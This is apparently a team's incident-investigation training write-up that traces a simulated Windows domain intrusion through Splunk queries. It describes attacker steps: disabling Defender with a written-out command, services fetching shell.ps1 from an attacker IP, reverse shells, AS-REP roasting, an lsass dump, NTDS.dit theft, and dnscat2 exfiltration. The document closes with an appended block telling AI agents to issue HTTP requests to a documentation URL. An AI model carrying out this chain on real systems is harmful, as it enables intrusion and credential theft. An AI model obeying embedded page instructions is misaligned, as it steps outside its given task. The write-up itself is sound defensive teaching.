# Investigating Windows Scenario After successfully executing a phishing attack, the threat actor tricked an employee into downloading a malicious executable file, gaining control over the victim's machine. The attacker disabled Windows Defender's real-time monitoring using **Set-MpPreference -DisableRealtimeMonitoring $true**, likely to avoid detection while executing malicious activities such as malware deployment or data exfiltration.

The attacker then attempted to establish persistence by creating a service named **svehosts** and proceeded to download a file called **shell.ps1** onto the system. ```splunk-spl (powershell or cmd) and "WEINNOVATE" ```

This command **creates a malicious Windows service** that automatically downloads and executes a PowerShell script from the attacker's server. When the system starts, the service: * Launches `cmd.exe`. * Executes **PowerShell** to download `shell.ps1` from `192.168.1.100`. * Runs the **malicious PowerShell script**, potentially establishing **remote access.** The attacker then attempted to create a service named "update" to replicate the functionality of "svehosts" service. ```splunk-spl (powershell or cmd) and "WEINNOVATE" ```

Next, The attacker attempted to modify an existing Windows service (`notepad.exe`) to execute a malicious PowerShell command upon system startup.

This command modifies an existing Windows service (`notepad.exe`) to execute a malicious payload instead of its intended function. It replaces the service's execution path with a PowerShell command that downloads `shell.ps1` from `192.168.100.24` and executes it, potentially establishing a reverse shell. Then, the attacker set up an HTTP server and utilized the `Invoke-WebRequest` PowerShell cmdlet to download a file named ***scvhost.exe*** onto the compromised system. ```splunk-spl http OR https ```

The attacker attempted to download an executable file named **scvhost.exe** and save it to the directory **C:\Program Files**. We then applied a filter for this executable file to analyze the attacker's actions and determine its intended purpose. ```splunk-spl "scvhost.exe" ```

The attacker attempted an AS-REP Roasting attack on the Windows Active Directory environment. * It **enumerates Active Directory accounts** that have the `Do not require Kerberos preauthentication` setting enabled. * Extracts **AS-REP response hashes** for those accounts. * Saves the hashes in **Hashcat format** for offline **password cracking**. * The attacker can then use **Hashcat** to brute-force weak passwords. The attacker then attempted to automate an FTP connection to `192.168.200.124` on port `4444`. Upon establishing the connection, they attempted to execute `cmd.exe`, potentially enabling remote command execution on the target server. This behavior is commonly associated with malicious activity, where attackers leverage FTP to establish a reverse shell or exfiltrate sensitive data. ```splunk-spl (powershell or cmd) and "WEINNOVATE" ```

He attempted to establish a reverse shell, but this time, he encoded the command. ```splunk-spl process.name: "powershell.exe" AND process.args: "-EncodedCommand" ```

We extracted this command and decoded it using CyberChef.

Then the attacker attempted to establish a reverse shell on port 4444 before switching to port 8080.

Next, the attacker attempted to bypass security restrictions by forcing PowerShell to execute scripts without limitations, disregarding any policies that might prevent script execution. After this, he attempted to enumerate Active Directory users who do not require Kerberos pre-authentication. ```splunk-spl (powershell or cmd) and "WEINNOVATE" ```

The attacker then attempted to download a tool named **Rubeus** from the HTTP server they configured, saving it to the `C:\Temp` directory.

The attacker downloaded this tool intending to perform an AS-REP Roasting attack but did not execute it. Instead, they prioritized establishing persistence by creating user accounts and scheduled tasks. Let's examine this further. Next, the attacker created a user named "admin." ```splunk-spl event.code: 4720 AND "WEINNOVATE" ```

He then attempted the AS-REP Roasting attack again, this time utilizing the Rubeus tool to extract hashes and save them to a file named *hashes.txt*. ```splunk-spl event.code:4688 and "WEINNOVATE" ```

Next, the attacker established persistence by creating a scheduled task named **"WindowsUpdate."** This task was configured to run every five minutes and execute a file named **"Windows\_Update.exe."** This task **runs under the SYSTEM account**, meaning it has **full administrative privileges**.

We also identified additional persistence mechanisms attempted by the attacker, such as a randomly named pipe (`wnqufs`).

He then attempted the AS-REP Roasting attack again using the `scvhostt.exe` executable, storing the extracted hashes in the Temp directory. After completing the attack, he opened the file ***updates.txt*** to check for any tickets that could be cracked to obtain the password.

The attacker then attempted network enumeration by executing commands such as `ipconfig` to display network configuration details and `arp -a` to retrieve the ARP table.

Next, the attacker attempted to generate a memory dump of the `lsass.exe` process (Local Security Authority Subsystem Service) and saved it as a file named *lsass.dump*.

The attacker then attempted to complete the enumeration process by listing all local user accounts using the `net users` command and identifying all visible computers on the network with the `net view` command.

Next, The attacker attempted to identify available hosts for lateral movement by using the `ping` command to determine which hosts were responsive.

Afterward, the attacker identified a host with the IP address **10.20.10.17** that responded to their requests. Consequently, they attempted to retrieve the machine's hostname and assess their privilege level on the system. We believe he obtained the password of the Administrator account by cracking the ticket he acquired during the AS-REP Roasting attack.

The attacker attempted to download a file named **Services.exe** and saved it to the following path: **C:\Users\Public\Services.exe**.

He then prepared for data exfiltration by archiving all files from the Documents and Desktop folders of all user accounts, saving the compressed data as a ZIP file named ***backup.zip*** in the *Public* folder.

He then downloaded a file named **explorer.exe** onto the domain controller and saved it in **C:\Windows\Temp\explorer.exe**.

He then attempted to enumerate all user accounts within the Active Directory domain before creating a new user account named **"systen"** with the password **"p\@ssw0rd"**.

Next, the attacker attempted to retrieve a list of users belonging to the "Domain Admins" group within the Active Directory (AD) domain. Subsequently, they added the previously created user, "systen," to the local Administrators group on the compromised system.

He then utilizes **NTDSUTIL**, a built-in Windows utility, to generate a full backup of the **Active Directory (AD) database (NTDS.DIT)**, storing the backup in **C:\Windows\Temp\backup**.

We believe the attacker returned to the PC10 device and leveraged **Robocopy**, a powerful command-line file copying tool in Windows, to steal user documents. The files were copied to a publicly accessible location (**C:\Users\Public\backup**), enabling later exfiltration of the data.

He then attempted to download a file named **update.exe** to the domain controller, saving it in the **Temp** directory under the same name.

The attacker then used WinRAR to compress, encrypt, and archive the **NTDS.dit** file along with the **SYSTEM** registry hive. This enabled them to extract Active Directory password hashes, facilitating potential credential theft and privilege escalation. The archived file was saved to **C:\Windows\Temp\backup.rar**.

The attacker then executed a **PowerShell command** to recursively search user directories for **text, CSV, Excel, and Word documents** containing keywords like **"password," "pass," "pwd," or "credentials,"** to steal stored credentials or sensitive information.

Then he completed enumerating the active directory by executing some commands like tree, whoami, diskpart.

* **`tree`** → Lists the directory structure, which can help an attacker understand the file system layout and locate sensitive files. * **`diskpart`** → Provides details about **disk partitions**, volumes, and mounted drives, which can reveal **network shares** and **hidden storage** used for data exfiltration. * **`whoami`** → Shows the **current user’s privileges**, domain, and group memberships, helping an attacker determine their level of access. Next, he utilized WinRAR to compress the contents of the `C:\DATA` directory into an archive named `Doms.rar`.

He then completed the enumeration by searching for sensitive information within text-based files and scanning the *C:\\* directory for sensitive data and scripts.

He then created a scheduled task named **WindowsUpdate**, configured to run every five minutes, as a persistence mechanism.

The attacker proceeded to enumerate all domain users to gather information on usernames and their associated descriptions.

He then attempted to enumerate all stored credentials on the Windows system.

He then downloaded a tool called **dnscat2** to exfiltrate the obtained data using DNS tunneling.

After downloading the dnscat2 tool, he manually configured the DNS server for the "Ethernet" interface to 192.168.100.179 (the attacker's IP address).

He disabled real-time monitoring on the PC10 machine, which was the initial point of compromise.

Next, the attacker began exfiltrating the acquired data, compressing it, and transmitting it to the IP addresses **192.168.100.179** and **192.168.100.24** using DNS tunneling.

Here, the attacker attempted to exfiltrate data using the **dnscat** tool.

The attacker then tried to disable system recovery by deleting all shadow copies, preventing file restoration and backup recovery.

This report was created by: * Fares Ebrahim Morcy * Abdelrahman Adly lofty * Amany Osama GadElmawla * Mohamed Elsayed Moghazy * Hoda amr Mohamed * Karim fathy salem * Youssef Khaled Sayed * Amjed Hatem --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://faresbltagy.gitbook.io/footprintinglabs/weinnovate-training/investigating-windows-scenario.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.